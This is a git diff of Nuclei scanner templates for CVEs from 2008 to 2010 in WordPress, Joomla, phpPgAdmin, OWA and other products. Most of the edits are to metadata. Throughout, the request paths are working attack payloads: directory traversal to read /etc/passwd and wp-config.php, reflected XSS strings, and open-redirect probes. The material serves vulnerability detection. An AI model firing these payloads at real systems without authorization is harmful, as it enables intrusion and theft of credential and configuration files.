severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. + remediation: | + Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1059 - - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/ + - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2008-1059 - cwe-id: CWE-79 - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + cwe-id: CWE-94 + epss-score: 0.01493 + epss-percentile: 0.86573 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: cve2008,cve,lfi,wordpress,wp-plugin,wp,sniplets,edb,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php' @@ -35,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-1061.yaml b/nuclei-templates/CVE-2008/CVE-2008-1061.yaml index 3fda88c56f..b395ef595b 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1061.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1061.yaml @@ -3,22 +3,47 @@ id: CVE-2008-1061 info: name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + epss-score: 0.00663 + epss-percentile: 0.77516 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Code Snippets' -requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -38,6 +63,4 @@ requests: - type: status status: - 200 - - -# Enhanced by mp on 2022/08/31 +# digest: 4a0a004730450220777bd4294b2dc57575646d8dc88fd119dc51c0d25f2086f36a7cdefefe5647e7022100df472d5c3da8f1e15e7c99529215af99987384e58c92d925163f10813a236e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-1547.yaml b/nuclei-templates/CVE-2008/CVE-2008-1547.yaml index ce8f0401d5..95335e8942 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-1547.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-1547.yaml @@ -6,25 +6,30 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + impact: | + An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks. + remediation: | + Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 - http://securityreason.com/securityalert/4441 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061 + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 - epss-score: 0.03523 + epss-score: 0.03875 + epss-percentile: 0.9108 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* - epss-percentile: 0.90347 metadata: max-request: 2 - shodan-query: http.title:"Outlook" vendor: microsoft product: exchange_server - tags: cve,cve2008,redirect,owa,exchange,microsoft + shodan-query: http.title:"Outlook" + tags: cve2008,cve,redirect,owa,exchange,microsoft http: - method: GET @@ -38,3 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4b0a00483046022100add61103f83105e6e0184e371a84b94bef42e3e534eec0ba3c444c81e603b7df022100c59d3962095aa5e3dc9897e04b109f9407889fe544bd9737d9675a3b767dc339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/cve-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2398.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2398.yaml diff --git a/nuclei-templates/CVE-2008/cve-2008-2650.yaml b/nuclei-templates/CVE-2008/CVE-2008-2650.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2650.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2650.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml index 9ab2e385ac..ab38886489 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml @@ -1,4 +1,5 @@ id: CVE-2008-4668 + info: name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal author: daffainfo @@ -7,20 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/6618 - https://www.cvedetails.com/cve/CVE-2008-4668 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - - http://securityreason.com/securityalert/4464 - classification: - cve-id: CVE-2008-4668 tags: cve,cve2008,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml b/nuclei-templates/CVE-2008/CVE-2008-5587.yaml index 6045940b95..fda684a006 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-5587.yaml @@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - tags: cve2008,lfi,phppgadmin + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6465.yaml b/nuclei-templates/CVE-2008/CVE-2008-6465.yaml index e5c8f02562..76631b2aac 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-6465.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-6465.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6465 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00421 + epss-percentile: 0.73765 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: parallels + product: h-sphere shodan-query: title:"Parallels H-Sphere tags: cve,cve2008,xss,parallels,h-sphere -requests: +http: - method: GET path: - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-6982.yaml b/nuclei-templates/CVE-2008/CVE-2008-6982.yaml index bbec36dfbb..384346aaaf 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-6982.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-6982.yaml @@ -3,23 +3,34 @@ id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari - severity: high + severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 + epss-score: 0.0038 + epss-percentile: 0.70097 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: devalcms + product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -39,5 +50,4 @@ requests: - type: status status: - 500 - -# Enhanced by md on 2022/09/20 +# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-7269.yaml b/nuclei-templates/CVE-2008/CVE-2008-7269.yaml index b6eca282e8..8eaf2fb274 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-7269.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-7269.yaml @@ -6,24 +6,27 @@ info: severity: medium description: | Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01358 + epss-score: 0.01425 + epss-percentile: 0.86241 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* - epss-percentile: 0.84524 metadata: - max-request: 1 - shodan-query: html:"SiteEngine" verified: "true" + max-request: 1 vendor: boka product: siteengine - tags: cve,cve2008,redirect,siteengine + shodan-query: html:"SiteEngine" + tags: cve,cve2008,redirect,siteengine,boka http: - method: GET @@ -35,3 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-6172.yaml b/nuclei-templates/CVE-2008/cve-2008-6172.yaml similarity index 100% rename from nuclei-templates/CVE-2008/CVE-2008-6172.yaml rename to nuclei-templates/CVE-2008/cve-2008-6172.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-6222.yaml b/nuclei-templates/CVE-2008/cve-2008-6222.yaml similarity index 100% rename from nuclei-templates/CVE-2008/CVE-2008-6222.yaml rename to nuclei-templates/CVE-2008/cve-2008-6222.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-0347.yaml b/nuclei-templates/CVE-2009/CVE-2009-0347.yaml index 3dc5f17842..550657fbfb 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-0347.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-0347.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 - epss-score: 0.09851 - epss-percentile: 0.94077 + epss-score: 0.10607 + epss-percentile: 0.94532 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,3 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4b0a00483046022100cf3670c23a13df5e6953abeb0b31099f649dedb0d0f8d27279f83729a6dfa817022100892363b09ea6413d98fec323ec8d65cc59e55bfc00166958fbaff5ac83e0f192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-1496.yaml b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-1496.yaml rename to nuclei-templates/CVE-2009/CVE-2009-1496.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml b/nuclei-templates/CVE-2009/CVE-2009-1872.yaml index 38cdeae599..2020a26398 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-1872.yaml @@ -6,15 +6,8 @@ info: severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. reference: - - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded + - https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 - - http://www.adobe.com/support/security/bulletins/apsb09-12.html - - http://www.dsecrg.com/pages/vul/show.php?id=122 - classification: - cve-id: CVE-2009-1872 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - verified: "true" tags: cve,cve2009,adobe,xss,coldfusion requests: diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-2100.yaml rename to nuclei-templates/CVE-2009/CVE-2009-2100.yaml diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-3318.yaml rename to nuclei-templates/CVE-2009/CVE-2009-3318.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml index 29b94221e9..8f872ac535 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml @@ -1,28 +1,27 @@ id: CVE-2009-4202 + info: - name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion author: daffainfo severity: high - description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/8870 - - http://www.vupen.com/english/advisories/2009/1494 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ - classification: - cve-id: CVE-2009-4202 + - https://www.cvedetails.com/cve/CVE-2009-4202 tags: cve,cve2009,joomla,lfi,photo + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2015.yaml b/nuclei-templates/CVE-2009/cve-2009-2015.yaml similarity index 100% rename from nuclei-templates/CVE-2009/CVE-2009-2015.yaml rename to nuclei-templates/CVE-2009/cve-2009-2015.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml b/nuclei-templates/CVE-2009/cve-2009-4679.yaml similarity index 100% rename from nuclei-templates/CVE-2009/CVE-2009-4679.yaml rename to nuclei-templates/CVE-2009/cve-2009-4679.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-5020.yaml b/nuclei-templates/CVE-2009/cve-2009-5020.yaml similarity index 100% rename from nuclei-templates/CVE-2009/CVE-2009-5020.yaml rename to nuclei-templates/CVE-2009/cve-2009-5020.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml b/nuclei-templates/CVE-2010/CVE-2010-0759.yaml deleted file mode 100644 index 326a4a8151..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-0759 -info: - name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. - reference: - - https://www.exploit-db.com/exploits/11498 - - https://www.cvedetails.com/cve/CVE-2010-0759 - - http://secunia.com/advisories/38637 - - http://www.securityfocus.com/bid/38296 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-0759 - tags: cve,cve2010,joomla,lfi,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1081.yaml b/nuclei-templates/CVE-2010/CVE-2010-1081.yaml deleted file mode 100644 index df9050f620..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1081.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1081 -info: - name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11511 - - https://www.cvedetails.com/cve/CVE-2010-1081 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1081 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1302.yaml b/nuclei-templates/CVE-2010/CVE-2010-1302.yaml deleted file mode 100644 index 061126f3fb..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1302.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1302 -info: - name: Joomla! Component DW Graph - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/11978 - - https://www.cvedetails.com/cve/CVE-2010-1302 - tags: cve,cve2010,joomla,lfi,graph - classification: - cve-id: CVE-2010-1302 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1304.yaml b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml index 0b865d1e8d..bacd107b78 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1304.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml @@ -1,28 +1,27 @@ id: CVE-2010-1304 + info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 - - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - - http://www.securityfocus.com/bid/39174 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1304 tags: cve,cve2010,joomla,lfi,status + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1305.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1305.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1306.yaml b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1306.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1306.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1313.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1313.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1314.yaml b/nuclei-templates/CVE-2010/CVE-2010-1314.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1314.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1314.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1429.yaml b/nuclei-templates/CVE-2010/CVE-2010-1429.yaml index 63b1ca0f85..29f5fdfb93 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1429.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1429.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. + remediation: | + Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - http://marc.info/?l=bugtraq&m=132698550418872&w=2 + - http://securitytracker.com/id?1023918 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1429 - cwe-id: CWE-200 + cwe-id: CWE-264 + epss-score: 0.00573 + epss-percentile: 0.77469 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: redhat + product: jboss_enterprise_application_platform shodan-query: title:"JBoss" - verified: "true" - tags: cve,cve2010,jboss,eap,tomcat,exposure + tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat -requests: +http: - method: GET path: - "{{BaseURL}}/status?full=true" @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml index 7a487e0507..1e3d3663a4 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml @@ -1,28 +1,27 @@ id: CVE-2010-1461 + info: 